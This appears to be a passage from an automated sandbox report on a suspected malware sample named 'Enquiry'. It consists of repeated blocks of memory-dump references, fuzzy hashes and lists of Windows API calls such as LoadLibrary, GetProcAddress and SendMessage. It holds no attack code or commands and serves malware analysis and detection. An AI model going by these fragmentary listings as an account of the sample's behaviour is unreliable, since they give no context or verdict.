                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpSendEcho
                            • API String ID: 2574300362-58917771
                            • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                            • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                            • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                            • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                            • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                            • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                            • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                            • API String ID: 2574300362-1816364905
                            • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                            • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                            • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                            • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                            APIs
                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                            • __itow.LIBCMT ref: 004699CD
                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                            • __itow.LIBCMT ref: 00469A97
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            • API String ID: 3379773720-0
                            • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                            • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                            • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                            • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                            • ScreenToClient.USER32(?,?), ref: 00449A80
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID:
                            • API String ID: 3880355969-0
                            • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                            • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                            • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                            • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                            • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                            • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                            • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                            APIs
                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                            • GetWindowRect.USER32(?,?), ref: 00441722
                            • PtInRect.USER32(?,?,?), ref: 00441734
                            • MessageBeep.USER32(00000000), ref: 004417AD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID:
                            • API String ID: 1352109105-0
                            • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                            • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                            • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                            • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                            APIs
                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                            • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                            • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                            • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                            • __isleadbyte_l.LIBCMT ref: 004208A6
                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                            • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                            • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                            • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                            APIs
                            • GetParent.USER32(?), ref: 004503C8
                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Proc$Parent
                            • String ID:
                            • API String ID: 2351499541-0
                            • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                            • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                            • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                            • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                            • TranslateMessage.USER32(?), ref: 00442B01
                            • DispatchMessageW.USER32(?), ref: 00442B0B
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Message$Peek$DispatchTranslate
                            • String ID:
                            • API String ID: 1795658109-0
                            • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                            • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                            • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                            • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                            APIs
                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                            • GetCaretPos.USER32(?), ref: 004743B2
                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                            • GetForegroundWindow.USER32 ref: 004743EE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                            APIs
                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                            • _wcslen.LIBCMT ref: 00449519
                            • _wcslen.LIBCMT ref: 00449526
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend_wcslen$_wcspbrk
                            • String ID:
                            • API String ID: 2886238975-0
                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __setmode$DebugOutputString_fprintf
                            • String ID:
                            • API String ID: 1792727568-0
                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                            APIs
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$Long$AttributesLayered
                            • String ID:
                            • API String ID: 2169480361-0
                            • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                            • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                            APIs
                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                            • String ID: cdecl
                            • API String ID: 3850814276-3896280584
                            • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                            • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                            APIs
